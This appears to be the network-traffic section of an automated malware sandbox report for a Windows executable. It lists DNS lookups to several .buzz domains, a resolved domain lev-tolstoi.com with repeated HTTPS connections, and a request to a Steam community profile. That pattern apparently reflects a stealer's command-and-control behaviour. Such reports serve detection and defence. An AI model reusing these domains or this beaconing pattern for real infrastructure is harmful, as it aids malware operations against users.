                                                                                                                                                                                                                                                              Dec 28, 2024 09:29:40.568221092 CET49701443192.168.2.10172.67.157.254
                                                                                                                                                                                                                                                              Dec 28, 2024 09:29:40.568234921 CET44349701172.67.157.254192.168.2.10
                                                                                                                                                                                                                                                              Dec 28, 2024 09:29:41.830440044 CET44349701172.67.157.254192.168.2.10
                                                                                                                                                                                                                                                              Dec 28, 2024 09:29:41.830604076 CET49701443192.168.2.10172.67.157.254
                                                                                                                                                                                                                                                              Dec 28, 2024 09:29:41.833621979 CET49701443192.168.2.10172.67.157.254
                                                                                                                                                                                                                                                              Dec 28, 2024 09:29:41.833635092 CET44349701172.67.157.254192.168.2.10
                                                                                                                                                                                                                                                              Dec 28, 2024 09:29:41.833925009 CET44349701172.67.157.254192.168.2.10
                                                                                                                                                                                                                                                              Dec 28, 2024 09:29:41.835246086 CET49701443192.168.2.10172.67.157.254
                                                                                                                                                                                                                                                              Dec 28, 2024 09:29:41.835266113 CET49701443192.168.2.10172.67.157.254
                                                                                                                                                                                                                                                              Dec 28, 2024 09:29:41.835325003 CET44349701172.67.157.254192.168.2.10
                                                                                                                                                                                                                                                              Dec 28, 2024 09:29:42.579576015 CET44349701172.67.157.254192.168.2.10
                                                                                                                                                                                                                                                              Dec 28, 2024 09:29:42.579682112 CET44349701172.67.157.254192.168.2.10
                                                                                                                                                                                                                                                              Dec 28, 2024 09:29:42.579741001 CET49701443192.168.2.10172.67.157.254
                                                                                                                                                                                                                                                              Dec 28, 2024 09:29:42.582010031 CET49701443192.168.2.10172.67.157.254
                                                                                                                                                                                                                                                              Dec 28, 2024 09:29:42.582024097 CET44349701172.67.157.254192.168.2.10
                                                                                                                                                                                                                                                              Dec 28, 2024 09:29:42.631688118 CET49702443192.168.2.10172.67.157.254
                                                                                                                                                                                                                                                              Dec 28, 2024 09:29:42.631738901 CET44349702172.67.157.254192.168.2.10
                                                                                                                                                                                                                                                              Dec 28, 2024 09:29:42.631863117 CET49702443192.168.2.10172.67.157.254
                                                                                                                                                                                                                                                              Dec 28, 2024 09:29:42.632406950 CET49702443192.168.2.10172.67.157.254
                                                                                                                                                                                                                                                              Dec 28, 2024 09:29:42.632422924 CET44349702172.67.157.254192.168.2.10
                                                                                                                                                                                                                                                              Dec 28, 2024 09:29:43.843683958 CET44349702172.67.157.254192.168.2.10
                                                                                                                                                                                                                                                              Dec 28, 2024 09:29:43.843810081 CET49702443192.168.2.10172.67.157.254
                                                                                                                                                                                                                                                              Dec 28, 2024 09:29:43.845043898 CET49702443192.168.2.10172.67.157.254
                                                                                                                                                                                                                                                              Dec 28, 2024 09:29:43.845053911 CET44349702172.67.157.254192.168.2.10
                                                                                                                                                                                                                                                              Dec 28, 2024 09:29:43.845295906 CET44349702172.67.157.254192.168.2.10
                                                                                                                                                                                                                                                              Dec 28, 2024 09:29:43.846489906 CET49702443192.168.2.10172.67.157.254
                                                                                                                                                                                                                                                              Dec 28, 2024 09:29:43.846553087 CET49702443192.168.2.10172.67.157.254
                                                                                                                                                                                                                                                              Dec 28, 2024 09:29:43.846566916 CET44349702172.67.157.254192.168.2.10
                                                                                                                                                                                                                                                              Dec 28, 2024 09:29:44.589555025 CET44349702172.67.157.254192.168.2.10
                                                                                                                                                                                                                                                              Dec 28, 2024 09:29:44.589636087 CET44349702172.67.157.254192.168.2.10
                                                                                                                                                                                                                                                              Dec 28, 2024 09:29:44.589672089 CET44349702172.67.157.254192.168.2.10
                                                                                                                                                                                                                                                              Dec 28, 2024 09:29:44.589713097 CET49702443192.168.2.10172.67.157.254
                                                                                                                                                                                                                                                              Dec 28, 2024 09:29:44.589729071 CET44349702172.67.157.254192.168.2.10
                                                                                                                                                                                                                                                              Dec 28, 2024 09:29:44.589812040 CET44349702172.67.157.254192.168.2.10
                                                                                                                                                                                                                                                              Dec 28, 2024 09:29:44.589850903 CET44349702172.67.157.254192.168.2.10
                                                                                                                                                                                                                                                              Dec 28, 2024 09:29:44.589852095 CET49702443192.168.2.10172.67.157.254
                                                                                                                                                                                                                                                              Dec 28, 2024 09:29:44.589862108 CET44349702172.67.157.254192.168.2.10
                                                                                                                                                                                                                                                              Dec 28, 2024 09:29:44.589907885 CET49702443192.168.2.10172.67.157.254
                                                                                                                                                                                                                                                              Dec 28, 2024 09:29:44.597790003 CET44349702172.67.157.254192.168.2.10
                                                                                                                                                                                                                                                              Dec 28, 2024 09:29:44.597846031 CET49702443192.168.2.10172.67.157.254
                                                                                                                                                                                                                                                              Dec 28, 2024 09:29:44.606231928 CET44349702172.67.157.254192.168.2.10
                                                                                                                                                                                                                                                              Dec 28, 2024 09:29:44.614464045 CET44349702172.67.157.254192.168.2.10
                                                                                                                                                                                                                                                              Dec 28, 2024 09:29:44.615478992 CET49702443192.168.2.10172.67.157.254
                                                                                                                                                                                                                                                              Dec 28, 2024 09:29:44.615489006 CET44349702172.67.157.254192.168.2.10
                                                                                                                                                                                                                                                              Dec 28, 2024 09:29:44.659852982 CET49702443192.168.2.10172.67.157.254
                                                                                                                                                                                                                                                              Dec 28, 2024 09:29:44.708991051 CET44349702172.67.157.254192.168.2.10
                                                                                                                                                                                                                                                              Dec 28, 2024 09:29:44.753771067 CET49702443192.168.2.10172.67.157.254
                                                                                                                                                                                                                                                              Dec 28, 2024 09:29:44.753782988 CET44349702172.67.157.254192.168.2.10
                                                                                                                                                                                                                                                              Dec 28, 2024 09:29:44.785098076 CET44349702172.67.157.254192.168.2.10
                                                                                                                                                                                                                                                              Dec 28, 2024 09:29:44.785145998 CET44349702172.67.157.254192.168.2.10
                                                                                                                                                                                                                                                              Dec 28, 2024 09:29:44.785242081 CET44349702172.67.157.254192.168.2.10
                                                                                                                                                                                                                                                              Dec 28, 2024 09:29:44.785250902 CET49702443192.168.2.10172.67.157.254
                                                                                                                                                                                                                                                              Dec 28, 2024 09:29:44.788975000 CET49702443192.168.2.10172.67.157.254
                                                                                                                                                                                                                                                              Dec 28, 2024 09:29:44.789428949 CET49702443192.168.2.10172.67.157.254
                                                                                                                                                                                                                                                              Dec 28, 2024 09:29:44.789453030 CET44349702172.67.157.254192.168.2.10
                                                                                                                                                                                                                                                              Dec 28, 2024 09:29:44.789465904 CET49702443192.168.2.10172.67.157.254
                                                                                                                                                                                                                                                              Dec 28, 2024 09:29:44.789472103 CET44349702172.67.157.254192.168.2.10
                                                                                                                                                                                                                                                              Dec 28, 2024 09:29:45.060838938 CET49703443192.168.2.10172.67.157.254
                                                                                                                                                                                                                                                              Dec 28, 2024 09:29:45.060883045 CET44349703172.67.157.254192.168.2.10
                                                                                                                                                                                                                                                              Dec 28, 2024 09:29:45.060991049 CET49703443192.168.2.10172.67.157.254
                                                                                                                                                                                                                                                              Dec 28, 2024 09:29:45.061321020 CET49703443192.168.2.10172.67.157.254
                                                                                                                                                                                                                                                              Dec 28, 2024 09:29:45.061337948 CET44349703172.67.157.254192.168.2.10
                                                                                                                                                                                                                                                              Dec 28, 2024 09:29:46.317421913 CET44349703172.67.157.254192.168.2.10
                                                                                                                                                                                                                                                              Dec 28, 2024 09:29:46.317493916 CET49703443192.168.2.10172.67.157.254
                                                                                                                                                                                                                                                              Dec 28, 2024 09:29:46.342159986 CET49703443192.168.2.10172.67.157.254
                                                                                                                                                                                                                                                              Dec 28, 2024 09:29:46.342180967 CET44349703172.67.157.254192.168.2.10
                                                                                                                                                                                                                                                              Dec 28, 2024 09:29:46.342444897 CET44349703172.67.157.254192.168.2.10
                                                                                                                                                                                                                                                              Dec 28, 2024 09:29:46.350033998 CET49703443192.168.2.10172.67.157.254
                                                                                                                                                                                                                                                              Dec 28, 2024 09:29:46.350505114 CET49703443192.168.2.10172.67.157.254
                                                                                                                                                                                                                                                              Dec 28, 2024 09:29:46.350563049 CET44349703172.67.157.254192.168.2.10
                                                                                                                                                                                                                                                              Dec 28, 2024 09:29:47.138997078 CET44349703172.67.157.254192.168.2.10
                                                                                                                                                                                                                                                              Dec 28, 2024 09:29:47.139292955 CET44349703172.67.157.254192.168.2.10
                                                                                                                                                                                                                                                              Dec 28, 2024 09:29:47.139364958 CET49703443192.168.2.10172.67.157.254
                                                                                                                                                                                                                                                              Dec 28, 2024 09:29:47.139446974 CET49703443192.168.2.10172.67.157.254
                                                                                                                                                                                                                                                              Dec 28, 2024 09:29:47.139465094 CET44349703172.67.157.254192.168.2.10
                                                                                                                                                                                                                                                              Dec 28, 2024 09:29:47.293731928 CET49704443192.168.2.10172.67.157.254
                                                                                                                                                                                                                                                              Dec 28, 2024 09:29:47.293797016 CET44349704172.67.157.254192.168.2.10
                                                                                                                                                                                                                                                              Dec 28, 2024 09:29:47.293878078 CET49704443192.168.2.10172.67.157.254
                                                                                                                                                                                                                                                              Dec 28, 2024 09:29:47.294176102 CET49704443192.168.2.10172.67.157.254
                                                                                                                                                                                                                                                              Dec 28, 2024 09:29:47.294203997 CET44349704172.67.157.254192.168.2.10
                                                                                                                                                                                                                                                              Dec 28, 2024 09:29:48.506809950 CET44349704172.67.157.254192.168.2.10
                                                                                                                                                                                                                                                              Dec 28, 2024 09:29:48.506896019 CET49704443192.168.2.10172.67.157.254
                                                                                                                                                                                                                                                              Dec 28, 2024 09:29:48.508266926 CET49704443192.168.2.10172.67.157.254
                                                                                                                                                                                                                                                              Dec 28, 2024 09:29:48.508277893 CET44349704172.67.157.254192.168.2.10
                                                                                                                                                                                                                                                              Dec 28, 2024 09:29:48.508526087 CET44349704172.67.157.254192.168.2.10
                                                                                                                                                                                                                                                              Dec 28, 2024 09:29:48.509800911 CET49704443192.168.2.10172.67.157.254
                                                                                                                                                                                                                                                              Dec 28, 2024 09:29:48.509999037 CET49704443192.168.2.10172.67.157.254
                                                                                                                                                                                                                                                              Dec 28, 2024 09:29:48.510032892 CET44349704172.67.157.254192.168.2.10
                                                                                                                                                                                                                                                              Dec 28, 2024 09:29:48.510083914 CET49704443192.168.2.10172.67.157.254
                                                                                                                                                                                                                                                              Dec 28, 2024 09:29:48.555334091 CET44349704172.67.157.254192.168.2.10
                                                                                                                                                                                                                                                              Dec 28, 2024 09:29:49.645133018 CET44349704172.67.157.254192.168.2.10
                                                                                                                                                                                                                                                              Dec 28, 2024 09:29:49.645270109 CET44349704172.67.157.254192.168.2.10
                                                                                                                                                                                                                                                              Dec 28, 2024 09:29:49.645314932 CET49704443192.168.2.10172.67.157.254
                                                                                                                                                                                                                                                              Dec 28, 2024 09:29:49.645490885 CET49704443192.168.2.10172.67.157.254
                                                                                                                                                                                                                                                              Dec 28, 2024 09:29:49.645514011 CET44349704172.67.157.254192.168.2.10
                                                                                                                                                                                                                                                              Dec 28, 2024 09:29:49.850709915 CET49705443192.168.2.10172.67.157.254
                                                                                                                                                                                                                                                              Dec 28, 2024 09:29:49.850769997 CET44349705172.67.157.254192.168.2.10
                                                                                                                                                                                                                                                              Dec 28, 2024 09:29:49.850847960 CET49705443192.168.2.10172.67.157.254
                                                                                                                                                                                                                                                              Dec 28, 2024 09:29:49.851171017 CET49705443192.168.2.10172.67.157.254
                                                                                                                                                                                                                                                              Dec 28, 2024 09:29:49.851183891 CET44349705172.67.157.254192.168.2.10
                                                                                                                                                                                                                                                              Dec 28, 2024 09:29:51.109605074 CET44349705172.67.157.254192.168.2.10
                                                                                                                                                                                                                                                              Dec 28, 2024 09:29:51.109685898 CET49705443192.168.2.10172.67.157.254
                                                                                                                                                                                                                                                              Dec 28, 2024 09:29:51.111010075 CET49705443192.168.2.10172.67.157.254
                                                                                                                                                                                                                                                              Dec 28, 2024 09:29:51.111021996 CET44349705172.67.157.254192.168.2.10
                                                                                                                                                                                                                                                              Dec 28, 2024 09:29:51.111278057 CET44349705172.67.157.254192.168.2.10
                                                                                                                                                                                                                                                              Dec 28, 2024 09:29:51.112674952 CET49705443192.168.2.10172.67.157.254
                                                                                                                                                                                                                                                              Dec 28, 2024 09:29:51.112862110 CET49705443192.168.2.10172.67.157.254
                                                                                                                                                                                                                                                              Dec 28, 2024 09:29:51.112895012 CET44349705172.67.157.254192.168.2.10
                                                                                                                                                                                                                                                              Dec 28, 2024 09:29:51.112967968 CET49705443192.168.2.10172.67.157.254
                                                                                                                                                                                                                                                              Dec 28, 2024 09:29:51.112976074 CET44349705172.67.157.254192.168.2.10
                                                                                                                                                                                                                                                              Dec 28, 2024 09:29:52.060604095 CET44349705172.67.157.254192.168.2.10
                                                                                                                                                                                                                                                              Dec 28, 2024 09:29:52.060718060 CET44349705172.67.157.254192.168.2.10
                                                                                                                                                                                                                                                              Dec 28, 2024 09:29:52.060782909 CET49705443192.168.2.10172.67.157.254
                                                                                                                                                                                                                                                              Dec 28, 2024 09:29:52.218760967 CET49705443192.168.2.10172.67.157.254
                                                                                                                                                                                                                                                              Dec 28, 2024 09:29:52.218799114 CET44349705172.67.157.254192.168.2.10
                                                                                                                                                                                                                                                              Dec 28, 2024 09:29:53.062423944 CET49707443192.168.2.10172.67.157.254
                                                                                                                                                                                                                                                              Dec 28, 2024 09:29:53.062474012 CET44349707172.67.157.254192.168.2.10
                                                                                                                                                                                                                                                              Dec 28, 2024 09:29:53.062535048 CET49707443192.168.2.10172.67.157.254
                                                                                                                                                                                                                                                              Dec 28, 2024 09:29:53.063020945 CET49707443192.168.2.10172.67.157.254
                                                                                                                                                                                                                                                              Dec 28, 2024 09:29:53.063034058 CET44349707172.67.157.254192.168.2.10
                                                                                                                                                                                                                                                              Dec 28, 2024 09:29:54.466945887 CET44349707172.67.157.254192.168.2.10
                                                                                                                                                                                                                                                              Dec 28, 2024 09:29:54.467025042 CET49707443192.168.2.10172.67.157.254
                                                                                                                                                                                                                                                              Dec 28, 2024 09:29:54.475023031 CET49707443192.168.2.10172.67.157.254
                                                                                                                                                                                                                                                              Dec 28, 2024 09:29:54.475037098 CET44349707172.67.157.254192.168.2.10
                                                                                                                                                                                                                                                              Dec 28, 2024 09:29:54.475387096 CET44349707172.67.157.254192.168.2.10
                                                                                                                                                                                                                                                              Dec 28, 2024 09:29:54.477178097 CET49707443192.168.2.10172.67.157.254
                                                                                                                                                                                                                                                              Dec 28, 2024 09:29:54.477370977 CET49707443192.168.2.10172.67.157.254
                                                                                                                                                                                                                                                              Dec 28, 2024 09:29:54.477375984 CET44349707172.67.157.254192.168.2.10
                                                                                                                                                                                                                                                              Dec 28, 2024 09:29:55.245541096 CET44349707172.67.157.254192.168.2.10
                                                                                                                                                                                                                                                              Dec 28, 2024 09:29:55.245641947 CET44349707172.67.157.254192.168.2.10
                                                                                                                                                                                                                                                              Dec 28, 2024 09:29:55.245718002 CET49707443192.168.2.10172.67.157.254
                                                                                                                                                                                                                                                              Dec 28, 2024 09:29:55.448590994 CET49707443192.168.2.10172.67.157.254
                                                                                                                                                                                                                                                              Dec 28, 2024 09:29:55.448636055 CET44349707172.67.157.254192.168.2.10
                                                                                                                                                                                                                                                              Dec 28, 2024 09:29:56.179677963 CET49710443192.168.2.10172.67.157.254
                                                                                                                                                                                                                                                              Dec 28, 2024 09:29:56.179804087 CET44349710172.67.157.254192.168.2.10
                                                                                                                                                                                                                                                              Dec 28, 2024 09:29:56.179912090 CET49710443192.168.2.10172.67.157.254
                                                                                                                                                                                                                                                              Dec 28, 2024 09:29:56.180331945 CET49710443192.168.2.10172.67.157.254
                                                                                                                                                                                                                                                              Dec 28, 2024 09:29:56.180361032 CET44349710172.67.157.254192.168.2.10
                                                                                                                                                                                                                                                              Dec 28, 2024 09:29:57.393476009 CET44349710172.67.157.254192.168.2.10
                                                                                                                                                                                                                                                              Dec 28, 2024 09:29:57.393601894 CET49710443192.168.2.10172.67.157.254
                                                                                                                                                                                                                                                              Dec 28, 2024 09:29:57.395467997 CET49710443192.168.2.10172.67.157.254
                                                                                                                                                                                                                                                              Dec 28, 2024 09:29:57.395473957 CET44349710172.67.157.254192.168.2.10
                                                                                                                                                                                                                                                              Dec 28, 2024 09:29:57.395698071 CET44349710172.67.157.254192.168.2.10
                                                                                                                                                                                                                                                              Dec 28, 2024 09:29:57.411470890 CET49710443192.168.2.10172.67.157.254
                                                                                                                                                                                                                                                              Dec 28, 2024 09:29:57.412271023 CET49710443192.168.2.10172.67.157.254
                                                                                                                                                                                                                                                              Dec 28, 2024 09:29:57.412291050 CET44349710172.67.157.254192.168.2.10
                                                                                                                                                                                                                                                              Dec 28, 2024 09:29:57.412398100 CET49710443192.168.2.10172.67.157.254
                                                                                                                                                                                                                                                              Dec 28, 2024 09:29:57.412417889 CET44349710172.67.157.254192.168.2.10
                                                                                                                                                                                                                                                              Dec 28, 2024 09:29:57.412524939 CET49710443192.168.2.10172.67.157.254
                                                                                                                                                                                                                                                              Dec 28, 2024 09:29:57.412615061 CET44349710172.67.157.254192.168.2.10
                                                                                                                                                                                                                                                              Dec 28, 2024 09:29:57.412741899 CET49710443192.168.2.10172.67.157.254
                                                                                                                                                                                                                                                              Dec 28, 2024 09:29:57.412764072 CET44349710172.67.157.254192.168.2.10
                                                                                                                                                                                                                                                              Dec 28, 2024 09:29:57.412893057 CET49710443192.168.2.10172.67.157.254
                                                                                                                                                                                                                                                              Dec 28, 2024 09:29:57.412920952 CET44349710172.67.157.254192.168.2.10
                                                                                                                                                                                                                                                              Dec 28, 2024 09:29:57.413058996 CET49710443192.168.2.10172.67.157.254
                                                                                                                                                                                                                                                              Dec 28, 2024 09:29:57.413079023 CET44349710172.67.157.254192.168.2.10
                                                                                                                                                                                                                                                              Dec 28, 2024 09:29:57.413089991 CET49710443192.168.2.10172.67.157.254
                                                                                                                                                                                                                                                              Dec 28, 2024 09:29:57.413110018 CET44349710172.67.157.254192.168.2.10
                                                                                                                                                                                                                                                              Dec 28, 2024 09:29:57.413248062 CET49710443192.168.2.10172.67.157.254
                                                                                                                                                                                                                                                              Dec 28, 2024 09:29:57.413279057 CET49710443192.168.2.10172.67.157.254
                                                                                                                                                                                                                                                              Dec 28, 2024 09:29:57.413290977 CET49710443192.168.2.10172.67.157.254
                                                                                                                                                                                                                                                              Dec 28, 2024 09:29:57.413309097 CET49710443192.168.2.10172.67.157.254
                                                                                                                                                                                                                                                              Dec 28, 2024 09:29:57.459326029 CET44349710172.67.157.254192.168.2.10
                                                                                                                                                                                                                                                              Dec 28, 2024 09:29:57.459517956 CET49710443192.168.2.10172.67.157.254
                                                                                                                                                                                                                                                              Dec 28, 2024 09:29:57.459556103 CET49710443192.168.2.10172.67.157.254
                                                                                                                                                                                                                                                              Dec 28, 2024 09:29:57.459573030 CET49710443192.168.2.10172.67.157.254
                                                                                                                                                                                                                                                              Dec 28, 2024 09:29:57.507322073 CET44349710172.67.157.254192.168.2.10
                                                                                                                                                                                                                                                              Dec 28, 2024 09:29:57.507525921 CET49710443192.168.2.10172.67.157.254
                                                                                                                                                                                                                                                              Dec 28, 2024 09:29:57.507575035 CET49710443192.168.2.10172.67.157.254
                                                                                                                                                                                                                                                              Dec 28, 2024 09:29:57.507595062 CET49710443192.168.2.10172.67.157.254
                                                                                                                                                                                                                                                              Dec 28, 2024 09:29:57.555330038 CET44349710172.67.157.254192.168.2.10
                                                                                                                                                                                                                                                              Dec 28, 2024 09:29:57.654006004 CET44349710172.67.157.254192.168.2.10
                                                                                                                                                                                                                                                              Dec 28, 2024 09:29:59.722357035 CET44349710172.67.157.254192.168.2.10
                                                                                                                                                                                                                                                              Dec 28, 2024 09:29:59.722465038 CET44349710172.67.157.254192.168.2.10
                                                                                                                                                                                                                                                              Dec 28, 2024 09:29:59.722620010 CET49710443192.168.2.10172.67.157.254
                                                                                                                                                                                                                                                              Dec 28, 2024 09:29:59.722872019 CET49710443192.168.2.10172.67.157.254
                                                                                                                                                                                                                                                              Dec 28, 2024 09:29:59.722887993 CET44349710172.67.157.254192.168.2.10
                                                                                                                                                                                                                                                              Dec 28, 2024 09:29:59.733601093 CET49711443192.168.2.10172.67.157.254
                                                                                                                                                                                                                                                              Dec 28, 2024 09:29:59.733647108 CET44349711172.67.157.254192.168.2.10
                                                                                                                                                                                                                                                              Dec 28, 2024 09:29:59.733735085 CET49711443192.168.2.10172.67.157.254
                                                                                                                                                                                                                                                              Dec 28, 2024 09:29:59.734080076 CET49711443192.168.2.10172.67.157.254
                                                                                                                                                                                                                                                              Dec 28, 2024 09:29:59.734092951 CET44349711172.67.157.254192.168.2.10
                                                                                                                                                                                                                                                              Dec 28, 2024 09:30:00.285341024 CET49711443192.168.2.10172.67.157.254

                                                                                                                                                                                                                                                              UDP Packets

                                                                                                                                                                                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                                                              Dec 28, 2024 09:29:36.356309891 CET5528453192.168.2.101.1.1.1
                                                                                                                                                                                                                                                              Dec 28, 2024 09:29:36.496120930 CET53552841.1.1.1192.168.2.10
                                                                                                                                                                                                                                                              Dec 28, 2024 09:29:36.561158895 CET6026853192.168.2.101.1.1.1
                                                                                                                                                                                                                                                              Dec 28, 2024 09:29:36.700977087 CET53602681.1.1.1192.168.2.10
                                                                                                                                                                                                                                                              Dec 28, 2024 09:29:36.804864883 CET5483053192.168.2.101.1.1.1
                                                                                                                                                                                                                                                              Dec 28, 2024 09:29:36.944902897 CET53548301.1.1.1192.168.2.10
                                                                                                                                                                                                                                                              Dec 28, 2024 09:29:36.952553034 CET5874053192.168.2.101.1.1.1
                                                                                                                                                                                                                                                              Dec 28, 2024 09:29:37.092700005 CET53587401.1.1.1192.168.2.10
                                                                                                                                                                                                                                                              Dec 28, 2024 09:29:37.100521088 CET5932153192.168.2.101.1.1.1
                                                                                                                                                                                                                                                              Dec 28, 2024 09:29:37.240359068 CET53593211.1.1.1192.168.2.10
                                                                                                                                                                                                                                                              Dec 28, 2024 09:29:37.245130062 CET6010253192.168.2.101.1.1.1
                                                                                                                                                                                                                                                              Dec 28, 2024 09:29:37.384407997 CET53601021.1.1.1192.168.2.10
                                                                                                                                                                                                                                                              Dec 28, 2024 09:29:37.387470007 CET5091653192.168.2.101.1.1.1
                                                                                                                                                                                                                                                              Dec 28, 2024 09:29:37.526751041 CET53509161.1.1.1192.168.2.10
                                                                                                                                                                                                                                                              Dec 28, 2024 09:29:37.530359030 CET5270353192.168.2.101.1.1.1
                                                                                                                                                                                                                                                              Dec 28, 2024 09:29:37.671672106 CET53527031.1.1.1192.168.2.10
                                                                                                                                                                                                                                                              Dec 28, 2024 09:29:37.676217079 CET5299053192.168.2.101.1.1.1
                                                                                                                                                                                                                                                              Dec 28, 2024 09:29:37.816015005 CET53529901.1.1.1192.168.2.10
                                                                                                                                                                                                                                                              Dec 28, 2024 09:29:37.819278955 CET6237453192.168.2.101.1.1.1
                                                                                                                                                                                                                                                              Dec 28, 2024 09:29:37.959151983 CET53623741.1.1.1192.168.2.10
                                                                                                                                                                                                                                                              Dec 28, 2024 09:29:40.424732924 CET5986553192.168.2.101.1.1.1
                                                                                                                                                                                                                                                              Dec 28, 2024 09:29:40.564867020 CET53598651.1.1.1192.168.2.10

                                                                                                                                                                                                                                                              DNS Queries

                                                                                                                                                                                                                                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                                                                                                              Dec 28, 2024 09:29:36.356309891 CET192.168.2.101.1.1.10x3c93Standard query (0)mindhandru.buzzA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                              Dec 28, 2024 09:29:36.561158895 CET192.168.2.101.1.1.10x924cStandard query (0)prisonyfork.buzzA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                              Dec 28, 2024 09:29:36.804864883 CET192.168.2.101.1.1.10x5debStandard query (0)rebuildeso.buzzA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                              Dec 28, 2024 09:29:36.952553034 CET192.168.2.101.1.1.10x8ab0Standard query (0)scentniej.buzzA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                              Dec 28, 2024 09:29:37.100521088 CET192.168.2.101.1.1.10x6b1cStandard query (0)inherineau.buzzA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                              Dec 28, 2024 09:29:37.245130062 CET192.168.2.101.1.1.10xa957Standard query (0)screwamusresz.buzzA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                              Dec 28, 2024 09:29:37.387470007 CET192.168.2.101.1.1.10xa9beStandard query (0)appliacnesot.buzzA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                              Dec 28, 2024 09:29:37.530359030 CET192.168.2.101.1.1.10x240bStandard query (0)cashfuzysao.buzzA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                              Dec 28, 2024 09:29:37.676217079 CET192.168.2.101.1.1.10x26cStandard query (0)hummskitnj.buzzA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                              Dec 28, 2024 09:29:37.819278955 CET192.168.2.101.1.1.10x8211Standard query (0)steamcommunity.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                              Dec 28, 2024 09:29:40.424732924 CET192.168.2.101.1.1.10x848cStandard query (0)lev-tolstoi.comA (IP address)IN (0x0001)false

                                                                                                                                                                                                                                                              DNS Answers

                                                                                                                                                                                                                                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                                                                                                              Dec 28, 2024 09:29:36.496120930 CET1.1.1.1192.168.2.100x3c93Name error (3)mindhandru.buzznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                              Dec 28, 2024 09:29:36.700977087 CET1.1.1.1192.168.2.100x924cName error (3)prisonyfork.buzznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                              Dec 28, 2024 09:29:36.944902897 CET1.1.1.1192.168.2.100x5debName error (3)rebuildeso.buzznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                              Dec 28, 2024 09:29:37.092700005 CET1.1.1.1192.168.2.100x8ab0Name error (3)scentniej.buzznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                              Dec 28, 2024 09:29:37.240359068 CET1.1.1.1192.168.2.100x6b1cName error (3)inherineau.buzznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                              Dec 28, 2024 09:29:37.384407997 CET1.1.1.1192.168.2.100xa957Name error (3)screwamusresz.buzznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                              Dec 28, 2024 09:29:37.526751041 CET1.1.1.1192.168.2.100xa9beName error (3)appliacnesot.buzznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                              Dec 28, 2024 09:29:37.671672106 CET1.1.1.1192.168.2.100x240bName error (3)cashfuzysao.buzznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                              Dec 28, 2024 09:29:37.816015005 CET1.1.1.1192.168.2.100x26cName error (3)hummskitnj.buzznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                              Dec 28, 2024 09:29:37.959151983 CET1.1.1.1192.168.2.100x8211No error (0)steamcommunity.com23.55.153.106A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                              Dec 28, 2024 09:29:40.564867020 CET1.1.1.1192.168.2.100x848cNo error (0)lev-tolstoi.com172.67.157.254A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                              Dec 28, 2024 09:29:40.564867020 CET1.1.1.1192.168.2.100x848cNo error (0)lev-tolstoi.com104.21.66.86A (IP address)IN (0x0001)false

                                                                                                                                                                                                                                                              HTTP Request Dependency Graph

                                                                                                                                                                                                                                                              • steamcommunity.com
                                                                                                                                                                                                                                                              • lev-tolstoi.com

                                                                                                                                                                                                                                                              HTTPS Proxied Packets

                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                              0192.168.2.104970023.55.153.1064438048C:\Users\user\Desktop\hx0wBsOjkQ.exe
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              2024-12-28 08:29:39 UTC219OUTGET /profiles/76561199724331900 HTTP/1.1
                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                              Host: steamcommunity.com
                                                                                                                                                                                                                                                              2024-12-28 08:29:40 UTC1905INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                              Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.fastly.steamstatic.com/ https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.fastly.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq. [TRUNCATED]
                                                                                                                                                                                                                                                              Expires: Mon, 26 Jul 1997 05:00:00 GMT
                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                              Date: Sat, 28 Dec 2024 08:29:39 GMT
                                                                                                                                                                                                                                                              Content-Length: 35121
                                                                                                                                                                                                                                                              Connection: close
